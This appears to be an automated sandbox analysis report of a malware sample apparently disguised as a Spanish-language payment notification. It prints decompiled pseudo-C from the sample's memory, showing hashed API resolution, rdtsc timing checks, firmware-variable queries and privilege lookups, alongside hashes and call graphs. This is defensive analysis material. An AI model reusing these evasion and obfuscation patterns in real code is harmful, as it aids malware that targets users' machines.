                                              • Instruction Fuzzy Hash: 0CE012B61045496FCB04DF58D891CDB73A9EF88328710830AF96983286C635D8628BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 62%
                                              			E0041A43B(void* __ecx, void* __esi, intOrPtr _a4, void* _a8) {
                                              				long _t10;
                                              
                                              				asm("scasd");
                                              				asm("popfd");
                                              				 *(__esi + 0x55) =  *(__esi + 0x55) & 0x0000008b;
                                              				_t7 = _a4;
                                              				_t4 = _t7 + 0x14; // 0x56c29f0f
                                              				_push(__esi);
                                              				_t5 = _t7 + 0xc6c; // 0x409d6f
                                              				E0041AF60( *_t4, _a4, _t5,  *_t4, 0, 0x2c);
                                              				_t10 = NtClose(_a8); // executed
                                              				return _t10;
                                              			}





                                              APIs
                                              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: d0aa205fe1e6e38b4b593f6b9e9ae15254f2181d8a8a5a87d44e3115b8728c33
                                              • Instruction ID: f6c937829e13b5049e456a8d4d14756eb2b923895600d005f137528e52e289f4
                                              • Opcode Fuzzy Hash: d0aa205fe1e6e38b4b593f6b9e9ae15254f2181d8a8a5a87d44e3115b8728c33
                                              • Instruction Fuzzy Hash: 6BE086711442106ED720DBA4CC85ED77B54DF49234F108159F59D97283C531E501C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0041A440(intOrPtr _a4, void* _a8) {
                                              				long _t8;
                                              
                                              				_t5 = _a4;
                                              				_t2 = _t5 + 0x14; // 0x56c29f0f
                                              				_t3 = _t5 + 0xc6c; // 0x409d6f
                                              				E0041AF60( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                              				_t8 = NtClose(_a8); // executed
                                              				return _t8;
                                              			}





                                              APIs
                                              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction ID: 647376dfd9c4a3ead1cf8bf61973886ae708b244be9dddf4ec43f9330a142b27
                                              • Opcode Fuzzy Hash: 829c97b90c121aadc2fe6170b15f633a5be8987cb5c0fe9b9f6c1e719d211015
                                              • Instruction Fuzzy Hash: 96D01772200218ABD620EB99DC89ED77BACDF48A64F118055BA4C5B242C530FA1086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E00408EC0(intOrPtr* _a4) {
                                              				intOrPtr _v8;
                                              				char _v24;
                                              				char _v284;
                                              				char _v804;
                                              				char _v840;
                                              				void* _t24;
                                              				void* _t31;
                                              				void* _t33;
                                              				void* _t34;
                                              				void* _t39;
                                              				void* _t50;
                                              				intOrPtr* _t52;
                                              				void* _t53;
                                              				void* _t54;
                                              				void* _t55;
                                              				void* _t56;
                                              
                                              				_t52 = _a4;
                                              				_t39 = 0; // executed
                                              				_t24 = E00407210(_t52,  &_v24); // executed
                                              				_t54 = _t53 + 8;
                                              				if(_t24 != 0) {
                                              					E00407420( &_v24,  &_v840);
                                              					_t55 = _t54 + 8;
                                              					do {
                                              						E0041BF30( &_v284, 0x104);
                                              						E0041C5A0( &_v284,  &_v804);
                                              						_t56 = _t55 + 0x10;
                                              						_t50 = 0x4f;
                                              						while(1) {
                                              							_t31 = E00415A30(E004159D0(_t52, _t50),  &_v284);
                                              							_t56 = _t56 + 0x10;
                                              							if(_t31 != 0) {
                                              								break;
                                              							}
                                              							_t50 = _t50 + 1;
                                              							if(_t50 <= 0x62) {
                                              								continue;
                                              							} else {
                                              							}
                                              							goto L8;
                                              						}
                                              						_t9 = _t52 + 0x18; // 0x5e14c483
                                              						 *(_t52 + 0x478) =  *(_t52 + 0x478) ^  *_t9;
                                              						_t39 = 1;
                                              						L8:
                                              						_t33 = E00407450( &_v24,  &_v840);
                                              						_t55 = _t56 + 8;
                                              					} while (_t33 != 0 && _t39 == 0);
                                              					_t34 = E004074D0(_t52,  &_v24); // executed
                                              					if(_t39 == 0) {
                                              						asm("rdtsc");
                                              						asm("rdtsc");
                                              						_v8 = _t34 - 0 + _t34;
                                              						 *((intOrPtr*)(_t52 + 0x560)) =  *((intOrPtr*)(_t52 + 0x560)) + 0xffffffba;
                                              					}
                                              					 *((intOrPtr*)(_t52 + 0x35)) =  *((intOrPtr*)(_t52 + 0x35)) + _t39;
                                              					_t20 = _t52 + 0x35; // 0xffff43e8
                                              					 *((intOrPtr*)(_t52 + 0x36)) =  *((intOrPtr*)(_t52 + 0x36)) +  *_t20 + 1;
                                              					return 1;
                                              				} else {
                                              					return _t24;
                                              				}
                                              			}




















                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 41a5e0-41a611 call 41af60 RtlAllocateHeap
                                              C-Code - Quality: 100%
                                              			E0041A5E0(intOrPtr _a4, char _a8, long _a12, char _a16) {
                                              				void* _t10;
                                              
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xc8c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
                                              				_t4 =  &_a16; // 0x4158ef
                                              				_t6 =  &_a8; // 0x415176
                                              				_t10 = RtlAllocateHeap( *_t6, _a12,  *_t4); // executed
                                              				return _t10;
                                              			}





                                              APIs
                                              • RtlAllocateHeap.NTDLL(vQA,?,XA,004158EF,?,00415176,?,?,?,?,?,00000000,00409103,?), ref: 0041A60D
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: vQA$XA
                                              • API String ID: 1279760036-3554124191
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 3 41a68d-41a68e 4 41a690-41a6e8 call 41af60 3->4 5 41a676-41a679 3->5 6 41a67f-41a68c ExitProcess 5->6 7 41a67a call 41af60 5->7 7->6
                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                              Strings
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID: D
                                              • API String ID: 621844428-3280389146
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 221 407210-407219 222 407220-40724c call 41be60 221->222 223 40721b-40721f 221->223 226 4072a8-4072ad 222->226 227 40724e 222->227 228 407250-407269 call 419e70 227->228 231 40726b-40729a GetFirmwareEnvironmentVariableExW call 41be60 228->231 232 4072ae-4072b0 228->232 236 40729f-4072a6 231->236 234 4072b2-4072d3 call 41a570 232->234 235 4072d4-4072e7 232->235 236->226 236->228
                                              C-Code - Quality: 100%
                                              			E00407210(intOrPtr* _a4, char _a8) {
                                              				intOrPtr _t12;
                                              				intOrPtr _t15;
                                              				intOrPtr _t24;
                                              				intOrPtr* _t36;
                                              				void* _t37;
                                              				void* _t38;
                                              				void* _t39;
                                              
                                              				_t36 = _a8;
                                              				if(_t36 != 0) {
                                              					_t32 = _a4;
                                              					 *_t36 = 0;
                                              					_a8 = 0x10000;
                                              					_t12 = E0041BE60(__eflags, _a4, 0, 0x10000, 0x1000, 4); // executed
                                              					_t38 = _t37 + 0x14;
                                              					 *_t36 = _t12;
                                              					__eflags = _t12;
                                              					if(_t12 == 0) {
                                              						L6:
                                              						__eflags = 0;
                                              						return 0;
                                              					} else {
                                              						while(1) {
                                              							_t15 = E00419E70(_t32, 5,  *_t36, _a8, 0); // executed
                                              							_t39 = _t38 + 0x14;
                                              							__eflags = _t15 - 0xc0000004;
                                              							if(__eflags != 0) {
                                              								break;
                                              							}
                                              							E0041A570(_t32,  *_t32, _t36,  &_a8, 0x8000); // executed
                                              							_t23 = _a8 + 0x10000;
                                              							 *_t36 = 0;
                                              							_a8 = _a8 + 0x10000;
                                              							_t24 = E0041BE60(__eflags, _t32, 0, _t23, 0x1000, 4); // executed
                                              							_t38 = _t39 + 0x28;
                                              							 *_t36 = _t24;
                                              							__eflags = _t24;
                                              							if(_t24 != 0) {
                                              								continue;
                                              							} else {
                                              								goto L6;
                                              							}
                                              							goto L10;
                                              						}
                                              						__eflags = _t15;
                                              						if(_t15 >= 0) {
                                              							 *((intOrPtr*)(_t36 + 0xc)) =  *_t36;
                                              							 *((intOrPtr*)(_t36 + 4)) = _a8;
                                              							return 1;
                                              						} else {
                                              							E0041A570(_t32,  *_t32, _t36,  &_a8, 0x8000);
                                              							 *_t36 = 0;
                                              							__eflags = 0;
                                              							return 0;
                                              						}
                                              					}
                                              				} else {
                                              					return 0;
                                              				}
                                              				L10:
                                              			}











                                              APIs
                                              • GetFirmwareEnvironmentVariableExW.KERNEL32 ref: 00407279
                                              Yara matches
                                              Similarity
                                              • API ID: EnvironmentFirmwareVariable
                                              • String ID:
                                              • API String ID: 3150624800-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 239 407678-4076ca call 41bf80 call 41cb60 call 40a130 call 415a90 249 4076cc-4076de PostThreadMessageW 239->249 250 4076fe-407702 239->250 251 4076e0-4076fa call 409890 249->251 252 4076fd 249->252 251->252 252->250
                                              C-Code - Quality: 54%
                                              			E00407678(signed int* __ebx, signed int __edx, intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* _t12;
                                              				int _t13;
                                              				long _t23;
                                              				int _t28;
                                              				void* _t31;
                                              				void* _t33;
                                              				signed int _t38;
                                              
                                              				_t38 = __edx ^  *__ebx;
                                              				asm("lahf");
                                              				asm("bound ecx, [edi]");
                                              				0x83ec();
                                              				_t31 = _t33;
                                              				_v68 = 0;
                                              				E0041BF80( &_v67, 0, 0x3f);
                                              				E0041CB60( &_v68, 3);
                                              				_t12 = E0040A130(_t38, _a4 + 0x20,  &_v68); // executed
                                              				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t28 = _t13;
                                              				if(_t28 != 0) {
                                              					_t23 = _a8;
                                              					_t13 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
                                              					_t40 = _t13;
                                              					if(_t13 == 0) {
                                              						_t13 =  *_t28(_t23, 0x8003, _t31 + (E00409890(_t40, 1, 8) & 0x000000ff) - 0x40, _t13);
                                              					}
                                              				}
                                              				return _t13;
                                              			}













                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 255 407680-40768f 256 407698-4076ca call 41cb60 call 40a130 call 415a90 255->256 257 407693 call 41bf80 255->257 264 4076cc-4076de PostThreadMessageW 256->264 265 4076fe-407702 256->265 257->256 266 4076e0-4076fa call 409890 264->266 267 4076fd 264->267 266->267 267->265
                                              C-Code - Quality: 82%
                                              			E00407680(intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* _t12;
                                              				intOrPtr* _t13;
                                              				int _t14;
                                              				long _t21;
                                              				intOrPtr* _t25;
                                              				void* _t26;
                                              				void* _t30;
                                              
                                              				_v68 = 0;
                                              				E0041BF80( &_v67, 0, 0x3f);
                                              				E0041CB60( &_v68, 3);
                                              				_t12 = E0040A130(_t30, _a4 + 0x20,  &_v68); // executed
                                              				_t13 = E00415A90(_a4 + 0x20, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t25 = _t13;
                                              				if(_t25 != 0) {
                                              					_t21 = _a8;
                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                              					_t32 = _t14;
                                              					if(_t14 == 0) {
                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409890(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                              					}
                                              					return _t14;
                                              				}
                                              				return _t13;
                                              			}













                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004076DA
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 297 41a612-41a637 call 41af60 299 41a63c-41a651 RtlFreeHeap 297->299
                                              C-Code - Quality: 58%
                                              			E0041A612(void* __ecx, signed int __edx, void* __edi, void* __fp0, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
                                              				signed int _v117;
                                              				void* _v547973437;
                                              				char _t13;
                                              
                                              				asm("int 0x3d");
                                              				asm("popfd");
                                              				_pop(_t27);
                                              				_v117 = _v117 | __edx;
                                              				_t10 = _a8;
                                              				_t6 = _t10 + 0xc90; // 0xc90
                                              				E0041AF60( *((intOrPtr*)(_a8 + 0x14)), _t10, _t6,  *((intOrPtr*)(_a8 + 0x14)), 0, 0x35);
                                              				_t13 = RtlFreeHeap(_a12, _a16, _a20); // executed
                                              				return _t13;
                                              			}







                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 2bbf3c62f1547936538f36e0aa77885b688e3179a141a25cd565361584540e7e
                                              • Instruction ID: bc00f8ccd7146db0347601e3343c91c77eea136d8c23055f5eab7594c92902d4
                                              • Opcode Fuzzy Hash: 2bbf3c62f1547936538f36e0aa77885b688e3179a141a25cd565361584540e7e
                                              • Instruction Fuzzy Hash: 3EF065B5600104AFDB14DF55DC46EEB37B8EF84354F108159F90EA7251C530E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0041A620(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                              				char _t10;
                                              
                                              				_t3 = _a4 + 0xc90; // 0xc90
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}





                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00409103,?,?,00409103,00000060,00000000,00000000,?,?,00409103,?,00000000), ref: 0041A64D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction ID: e76337afa916636dc7999d0b0cc11d2e66c0cc36247d0f50dc268ede5031f4cd
                                              • Opcode Fuzzy Hash: a6e6f41d857b18798f6d11579541f16a6a166f54801e0754a839ad98261f1417
                                              • Instruction Fuzzy Hash: 14E012B1200208ABDB14EF89DC49EA737ACEF88764F118159BA085B242C630E9208AB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E0041A780(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                              				int _t10;
                                              
                                              				E0041AF60( *((intOrPtr*)(_a4 + 0xa1c)), _a4, _t7 + 0xca8,  *((intOrPtr*)(_a4 + 0xa1c)), 0, 0x46);
                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}





                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D5B2,0040D5B2,00000041,00000000,?,00409175), ref: 0041A7B0
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction ID: f191f6caa62469aa0aeb0b25a98ea8bb3e9aa7cd5fa1fede7adac256a7a22315
                                              • Opcode Fuzzy Hash: b6c9d2bb7c1b66bb05113664278c8ba5e33a8a1c89f8aae2c7e428828915c1da
                                              • Instruction Fuzzy Hash: 4EE01AB12002086BDB10DF49CC45EE737ADEF89664F118155BA0C57241C530E8158AB5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A688
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction ID: 43fab5bc382f8dbf035fa71370f402dcb25f1a4f198c16d6a3d81994ba933d62
                                              • Opcode Fuzzy Hash: 1cfc6acf09b4d581fed35e39f5b9fca2d0b24bba4d46bbacac3375e597e63901
                                              • Instruction Fuzzy Hash: 70D017726002187BD620EB99CC89FD777ACDF49BA4F1580A5BA0C6B242C934BA5187E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 47%
                                              			E00417FEB(void* __eax, void* __ebx) {
                                              				void* _t1;
                                              				void* _t2;
                                              				void* _t9;
                                              
                                              				_t2 = __ebx;
                                              				_t1 = __eax;
                                              				asm("sbb eax, 0x5a4e632c");
                                              				asm("ror byte [edi+0x4311edd0], 1");
                                              				do {
                                              					_t2 = _t2 + 1;
                                              					_t9 = _t2;
                                              				} while (_t9 > 0);
                                              				asm("sbb ebp, [eax+0x31]");
                                              				asm("rcr byte [edi+0x3caf9221], cl");
                                              				_push(ss);
                                              				if(_t9 <= 0) {
                                              				}
                                              				return _t1;
                                              			}







                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 713b9d538384fd9259be42851c451dd692237f0e1456fddfacb3674368d90f5c
                                              • Instruction ID: 24a62b28896cdfa74019ef1de05a093a588fa2668af02c325f38885156889fc3
                                              • Opcode Fuzzy Hash: 713b9d538384fd9259be42851c451dd692237f0e1456fddfacb3674368d90f5c
                                              • Instruction Fuzzy Hash: 91D0A713649789025750B8AD7C408E4FB50F5871A1FD427A6C91457107DE47B475425D
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dca4749500cbe73d6381d9693766356c3ebfc84f3a8c130e7e7856c49b2b08f
                                              • Instruction ID: 76a54868d3ea3ce24db0a495959cadd894435872b1ebd15e8658e0df6d4a9716
                                              • Opcode Fuzzy Hash: 4dca4749500cbe73d6381d9693766356c3ebfc84f3a8c130e7e7856c49b2b08f
                                              • Instruction Fuzzy Hash: 9FC01223A4B35685C12A8964BD441F8FBA0D54352DB5456DFCC94E34168252D012438A
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 88%
                                              			E004072F0(void* __edi, intOrPtr _a4, struct HMENU__* _a8) {
                                              				short _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				void* __esi;
                                              				intOrPtr _t31;
                                              				unsigned int _t36;
                                              				unsigned int _t52;
                                              				struct HMENU__* _t55;
                                              
                                              				_t55 = _a8;
                                              				_v24 = 0x53005b;
                                              				_v20 = 0x730079;
                                              				_v16 = 0x650074;
                                              				_v12 = 0x5d006d;
                                              				_v8 = 0;
                                              				GetMenuState(_t55, 0x22c, ??);
                                              				_t31 = _a4;
                                              				_t55->i = 0x22c;
                                              				 *((intOrPtr*)(_t55 + 4)) = 0;
                                              				 *((intOrPtr*)(_t55 + 8)) =  *((intOrPtr*)(_t31 + 0x44));
                                              				 *((intOrPtr*)(_t55 + 0xc)) = 0;
                                              				 *((intOrPtr*)(_t55 + 0x10)) = 0;
                                              				 *((intOrPtr*)(_t55 + 0x14)) =  *((intOrPtr*)(_t31 + 4));
                                              				 *((intOrPtr*)(_t55 + 0x18)) =  *((intOrPtr*)(_t31 + 0x48));
                                              				 *((intOrPtr*)(_t55 + 0x1c)) =  *((intOrPtr*)(_t31 + 0x40));
                                              				 *((intOrPtr*)(_t55 + 0x20)) = 0;
                                              				_t48 =  *((intOrPtr*)(_t31 + 0x3c));
                                              				if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                              					E0041BF00(_t55 + 0x24,  &_v24, E0041C1F0(_t55,  &_v24) + _t32 * 2);
                                              					return 1;
                                              				} else {
                                              					_t36 =  *(_t31 + 0x38) & 0x0000ffff;
                                              					_t52 = _t36;
                                              					if(_t36 >= 0x206) {
                                              						_t52 = 0x206;
                                              					}
                                              					_t22 = _t55 + 0x24; // 0x408f1b
                                              					E0041BF00(_t22, _t48, _t52);
                                              					 *((short*)(_t55 + 0x24 + (_t52 >> 1) * 2)) = 0;
                                              					return 1;
                                              				}
                                              			}














                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MenuState
                                              • String ID: [$m$t$y
                                              • API String ID: 1976172297-3854059060
                                              • Opcode ID: c72bc8ba82aba81f23077ec36f683d7a5ac0d5dfccb06af5a573fe62a0b31416
                                              • Instruction ID: 24dbf0c1ececcff796b88f3f98cc6ccaece1d553e73979344f676e017cc54418
                                              • Opcode Fuzzy Hash: c72bc8ba82aba81f23077ec36f683d7a5ac0d5dfccb06af5a573fe62a0b31416
                                              • Instruction Fuzzy Hash: 3521F1B19007049FC724DF5AD8408ABB7F5EF88300F00866EE8499B361E7B5E941CBD4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E004072E8(intOrPtr _a4, struct HMENU__* _a8) {
                                              				short _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				void* __esi;
                                              				intOrPtr _t31;
                                              				unsigned int _t36;
                                              				unsigned int _t52;
                                              				int _t55;
                                              				struct HMENU__* _t56;
                                              
                                              				asm("repe pop ebx");
                                              				asm("sbb ch, [esp+edi*2]");
                                              				asm("cmpsd");
                                              				asm("rcr cl, 0x55");
                                              				_t56 = _a8;
                                              				_v24 = 0x53005b;
                                              				_v20 = 0x730079;
                                              				_v16 = 0x650074;
                                              				_v12 = 0x5d006d;
                                              				_v8 = 0;
                                              				GetMenuState(_t56, 0x22c, _t55);
                                              				_t31 = _a4;
                                              				_t56->i = 0x22c;
                                              				 *((intOrPtr*)(_t56 + 4)) = 0;
                                              				 *((intOrPtr*)(_t56 + 8)) =  *((intOrPtr*)(_t31 + 0x44));
                                              				 *((intOrPtr*)(_t56 + 0xc)) = 0;
                                              				 *((intOrPtr*)(_t56 + 0x10)) = 0;
                                              				 *((intOrPtr*)(_t56 + 0x14)) =  *((intOrPtr*)(_t31 + 4));
                                              				 *((intOrPtr*)(_t56 + 0x18)) =  *((intOrPtr*)(_t31 + 0x48));
                                              				 *((intOrPtr*)(_t56 + 0x1c)) =  *((intOrPtr*)(_t31 + 0x40));
                                              				 *((intOrPtr*)(_t56 + 0x20)) = 0;
                                              				_t48 =  *((intOrPtr*)(_t31 + 0x3c));
                                              				if( *((intOrPtr*)(_t31 + 0x3c)) == 0) {
                                              					E0041BF00(_t56 + 0x24,  &_v24, E0041C1F0(_t56,  &_v24) + _t32 * 2);
                                              					return 1;
                                              				} else {
                                              					_t36 =  *(_t31 + 0x38) & 0x0000ffff;
                                              					_t52 = _t36;
                                              					if(_t36 >= 0x206) {
                                              						_t52 = 0x206;
                                              					}
                                              					_t22 = _t56 + 0x24; // 0x408f1b
                                              					E0041BF00(_t22, _t48, _t52);
                                              					 *((short*)(_t56 + 0x24 + (_t52 >> 1) * 2)) = 0;
                                              					return 1;
                                              				}
                                              			}















                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MenuState
                                              • String ID: [$m$t$y
                                              • API String ID: 1976172297-3854059060
                                              • Opcode ID: 13de45646ef89cb9105bad8a78ee1a4cc6d6b493be9d42d5f15e2e39cad6b40c
                                              • Instruction ID: 26ed326a5b3e1b1493ee5daa830cc76c90c3492fa04c7ec63bf5149aef31a4fa
                                              • Opcode Fuzzy Hash: 13de45646ef89cb9105bad8a78ee1a4cc6d6b493be9d42d5f15e2e39cad6b40c
                                              • Instruction Fuzzy Hash: B1119D70904B049FC724CF6AD44499BBBF6EF88300F10866EE8898B761E3B4E945CBC4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Execution Graph

                                              Execution Coverage:5.1%
                                              Dynamic/Decrypted Code Coverage:2%
                                              Signature Coverage:0%
                                              Total number of Nodes:706
                                              Total number of Limit Nodes:87
